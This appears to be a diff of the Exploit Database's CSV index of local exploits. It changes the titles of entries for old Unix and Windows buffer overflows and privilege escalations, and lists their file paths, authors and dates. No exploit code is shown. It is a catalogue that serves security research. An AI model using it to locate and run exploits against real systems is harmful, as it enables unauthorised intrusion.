19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch / RDS Fix - Registry Key",1999-09-21,.rain.forest.puppy,windows,local,0 -19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local,0 +19508,platforms/linux/local/19508.sh,"SuSE Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local,0 19509,platforms/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",linux,local,0 19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 - Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 @@ -7539,7 +7557,7 @@ id,file,description,date,author,platform,type,port 19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",multiple,local,0 19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 -19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - 'cwdtools'",1999-10-22,"Brock Tellier",linux,local,0 +19565,platforms/linux/local/19565.sh,"SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation",1999-10-22,"Brock Tellier",linux,local,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Backdoor",1999-12-10,"Pauli Ojanpera",windows,local,0 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local,0 19676,platforms/linux/local/19676.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Buffer Overflow (1)",2000-05-17,"Brock Tellier",linux,local,0 @@ -7555,11 +7573,11 @@ id,file,description,date,author,platform,type,port 19641,platforms/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow",1999-11-25,K2,sco,local,0 19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 - 'xlock(1)' 'Username' Buffer Overflow",1999-11-25,AK,sco,local,0 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local,0 -19647,platforms/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure'",1999-11-30,UNYUN,solaris,local,0 +19647,platforms/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation",1999-11-30,UNYUN,solaris,local,0 19648,platforms/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0 19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink",1999-12-01,"Brock Tellier",freebsd,local,0 -19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid Dialer",1999-12-01,"Brock Tellier",freebsd,local,0 +19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon SetGID Dialer",1999-12-01,"Brock Tellier",freebsd,local,0 19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 - 'xmindpath' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 - 'angband' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 @@ -7583,7 +7601,7 @@ id,file,description,date,author,platform,type,port 19699,platforms/linux/local/19699.txt,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (1)",1999-12-29,Shevek,linux,local,0 19700,platforms/linux/local/19700.c,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (2)",1999-12-29,morpheus[bd],linux,local,0 19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH",1999-12-30,Loneguard,multiple,local,0 -19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - 'midikeys'/'soundplayer'",1999-12-31,Loneguard,irix,local,0 +19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - 'midikeys'/'soundplayer' Privilege Escalation",1999-12-31,Loneguard,irix,local,0 19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link",1999-12-31,Loneguard,unix,local,0 19709,platforms/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (1)",2000-01-04,dildog,linux,local,0 19710,platforms/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (2)",2000-03-15,"Elias Levy",linux,local,0 @@ -7596,13 +7614,13 @@ id,file,description,date,author,platform,type,port 19735,platforms/linux/local/19735.txt,"Debian 2.1 - apcd Symlink",2000-02-01,anonymous,linux,local,0 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron & Nobuo Miwa",windows,local,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink",2000-02-15,"Shawn Bracken",sco,local,0 -19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - 'autorun.inf'",2000-02-18,"Eric Stevens",windows,local,0 -19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu'",2000-02-19,anonymous,freebsd,local,0 +19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - 'autorun.inf' Code Execution",2000-02-18,"Eric Stevens",windows,local,0 +19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Privilege Escalation",2000-02-19,anonymous,freebsd,local,0 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink",2000-02-21,sp00n,solaris,local,0 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig",2000-02-24,suid,linux,local,0 -19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - 'setxconf'",2000-02-24,suid,linux,local,0 +19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - 'setxconf' Privilege Escalation",2000-02-24,suid,linux,local,0 19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow",2012-07-12,b33f,windows,local,0 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 @@ -7616,7 +7634,7 @@ id,file,description,date,author,platform,type,port 19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation",2000-03-11,"S. Krahmer",linux,local,0 19811,platforms/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (1)",2000-03-13,funkysh,linux,local,0 19812,platforms/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 -19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - 'kreatecd'",2000-03-16,Sebastian,linux,local,0 +19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / SuSE Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Privilege Escalation",2000-03-16,Sebastian,linux,local,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",linux,local,0 19821,platforms/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",multiple,local,0 19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Command Execution",2000-03-24,kadokev,unix,local,0 @@ -7629,16 +7647,16 @@ id,file,description,date,author,platform,type,port 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A - 'crypt()' Privilege Escalation",2000-04-15,Sean,qnx,local,0 19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0 19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 - Undocumented Password",2000-05-08,"Stake Inc",unix,local,0 -19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x - Arbitrary File Deletion",2000-04-21,Peter_M,linux,local,0 +19867,platforms/linux/local/19867.txt,"SuSE Linux 6.x - Arbitrary File Deletion",2000-04-21,Peter_M,linux,local,0 19872,platforms/solaris/local/19872.c,"Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (1)",2000-04-24,DiGiT,solaris,local,0 19873,platforms/solaris/local/19873.c,"Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (2)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 19874,platforms/solaris/local/19874.c,"Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (3)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 19875,platforms/immunix/local/19875.txt,"PostgreSQL 6.3.2/6.5.3 - Cleartext Passwords",2000-04-23,"Robert van der Meulen",immunix,local,0 19876,platforms/solaris/local/19876.c,"Solaris 7.0/8 - Xsun Buffer Overrun",2000-04-24,DiGiT,solaris,local,0 19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 - lp -d Option Buffer Overflow",2000-04-24,DiGiT,solaris,local,0 -19883,platforms/linux/local/19883.c,"S.u.S.E. Linux 6.3/6.4 Gnomelib - Buffer Overflow",2000-04-29,bladi,linux,local,0 +19883,platforms/linux/local/19883.c,"SuSE Linux 6.3/6.4 Gnomelib - Buffer Overflow",2000-04-29,bladi,linux,local,0 19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 - eToken PIN Extraction",2000-05-04,kingpin,windows,local,0 -19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - 'pam_console'",2000-05-03,"Michal Zalewski",linux,local,0 +19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout",2000-05-03,"Michal Zalewski",linux,local,0 19910,platforms/solaris/local/19910.c,"Solaris 2.6/7.0/8 - 'netpr' Buffer Overflow (1)",1999-05-23,ADM,solaris,local,0 19911,platforms/solaris/local/19911.c,"Solaris 2.6/7.0/8 - 'netpr' Buffer Overflow (2)",1999-03-04,ADM,solaris,local,0 19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink",2000-05-10,foo,multiple,local,0 @@ -7647,9 +7665,9 @@ id,file,description,date,author,platform,type,port 19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler '.XML' Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local,0 -19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 -19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 -19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 +19952,platforms/linux/local/19952.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 +19953,platforms/linux/local/19953.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 +19954,platforms/linux/local/19954.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0 / qpopper 2.52/2.53 - 'EUIDL' Format String Input",2000-05-24,Prizm,linux,local,0 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0 19968,platforms/windows/local/19968.c,"Microsoft Windows Server 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 @@ -7684,7 +7702,7 @@ id,file,description,date,author,platform,type,port 20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' File DEP Bypass",2012-07-23,"Daniel Romero",windows,local,0 20056,platforms/unix/local/20056.c,"Visible Systems Razor 4.1 - Password File (1)",2000-06-16,pbw,unix,local,0 20058,platforms/unix/local/20058.pl,"Visible Systems Razor 4.1 - Password File (2)",2000-06-15,"Shawn A. Clifford",unix,local,0 -20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open'",2000-07-12,"Joey Hess",unix,local,0 +20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure Perl 'open' Code Execution",2000-07-12,"Joey Hess",unix,local,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0 20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation",2001-06-11,xternal,cgi,local,0 20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - xconq Buffer Overflow",2000-06-22,V9,linux,local,0 @@ -7735,7 +7753,7 @@ id,file,description,date,author,platform,type,port 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0 20274,platforms/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 -20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 +20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Privilege Escalation",2000-10-10,@stake,solaris,local,0 20285,platforms/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution",2000-10-06,X-Force,linux,local,0 20290,platforms/aix/local/20290.txt,"AIX 3.x - bugfiler Arbitrary File Creation",1997-09-08,"Johannes Schwabe",aix,local,0 20291,platforms/linux/local/20291.sh,"Elm 2.4 - 'filter' Arbitrary Mail Disclosure",1995-12-26,"David J Meltzer",linux,local,0 @@ -7795,7 +7813,7 @@ id,file,description,date,author,platform,type,port 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow",2001-01-18,"Luis Miguel Silva",linux,local,0 20585,platforms/windows/local/20585.txt,"LocalWEB2000 1.1 - Directory Traversal",2001-01-22,"SNS Research",windows,local,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 - ximp40 Library Buffer Overflow",2001-01-31,UNYUN,solaris,local,0 -20604,platforms/linux/local/20604.sh,"Debian 2.2 / S.u.S.E 6.3/6.4/7.0 - man '-l' Format String",2001-01-31,IhaQueR,linux,local,0 +20604,platforms/linux/local/20604.sh,"Debian 2.2 / Su.S.E 6.3/6.4/7.0 - man '-l' Format String",2001-01-31,IhaQueR,linux,local,0 20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution",2001-02-12,"Dixie Flatline",unix,local,0 20626,platforms/linux/local/20626.c,"Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC)",2001-02-09,"Chris Evans",linux,local,0 20645,platforms/linux/local/20645.c,"Elm 2.5.3 - Alternative-Folder Buffer Overflow",2001-02-13,_kiss_,linux,local,0 @@ -7834,7 +7852,7 @@ id,file,description,date,author,platform,type,port 40422,platforms/windows/local/40422.txt,"NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0 -20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 +20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / SuSE Linux 6.x/7.0/7.1 - 'Man -S' Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local,0 20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 @@ -7912,8 +7930,8 @@ id,file,description,date,author,platform,type,port 21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,windows,local,0 40418,platforms/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local,0 21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local,0 -21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local,0 -21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local,0 +21158,platforms/linux/local/21158.c,"SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local,0 +21159,platforms/linux/local/21159.c,"SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local,0 21173,platforms/windows/local/21173.pl,"McKesson Pathways Homecare 6.5 - Weak 'Username' and Password Encryption",2001-12-07,shoeboy,windows,local,0 21176,platforms/freebsd/local/21176.c,"FreeBSD 4.4 - AIO Library Cross Process Memory Write",2001-12-10,"David Rufino",freebsd,local,0 40417,platforms/windows/local/40417.txt,"Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation",2016-09-23,Tulpa,windows,local,0 @@ -8198,7 +8216,7 @@ id,file,description,date,author,platform,type,port 23096,platforms/windows/local/23096.txt,"Microsoft WordPerfect - Converter Buffer Overrun",2003-09-03,valgasu,windows,local,0 23119,platforms/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 -23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass",2003-09-15,Texonet,sco,local,0 +23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' 'REMOTE_ADDR' Authentication Bypass",2003-09-15,Texonet,sco,local,0 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local,0 23154,platforms/linux/local/23154.c,"Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",linux,local,0 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Escalation",2003-09-22,"Sebastian Krahmer",linux,local,0 @@ -8245,7 +8263,6 @@ id,file,description,date,author,platform,type,port 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0 23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0 -23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0 23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0 23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 @@ -8261,7 +8278,7 @@ id,file,description,date,author,platform,type,port 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0 23989,platforms/windows/local/23989.c,"Microsoft Windows NT 4.0/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0 -23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'",2013-01-09,"Debasish Mandal",windows,local,0 +23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'File Memory Corruption / Arbitrary Code Execution",2013-01-09,"Debasish Mandal",windows,local,0 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 @@ -8311,10 +8328,10 @@ id,file,description,date,author,platform,type,port 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local,0 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation",2013-03-25,Dr_IDE,windows,local,0 -24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote",2013-03-25,Dr_IDE,windows,local,0 +24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Code Execution",2013-03-25,Dr_IDE,windows,local,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 -24919,platforms/windows/local/24919.py,"HexChat 2.9.4 - Local",2013-04-07,"Matt Andreko",windows,local,0 +24919,platforms/windows/local/24919.py,"HexChat 2.9.4 - Overflow",2013-04-07,"Matt Andreko",windows,local,0 24923,platforms/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",multiple,local,0 24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Privilege Escalation (Metasploit)",2013-04-08,Metasploit,linux,local,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 @@ -8428,7 +8445,7 @@ id,file,description,date,author,platform,type,port 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 -27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local",2013-08-26,"Ayman Sagy",windows,local,0 +27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Overflow",2013-08-26,"Ayman Sagy",windows,local,0 27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,linux,local,0 27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0 27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 @@ -8507,7 +8524,7 @@ id,file,description,date,author,platform,type,port 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil & abh1sek",windows,local,0 29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 -29950,platforms/osx/local/29950.js,"Apple 2.0.4 - Safari Local",2007-05-04,poplix,osx,local,0 +29950,platforms/osx/local/29950.js,"Apple 2.0.4 - Safari Local Cross-Site Scripting",2007-05-04,poplix,osx,local,0 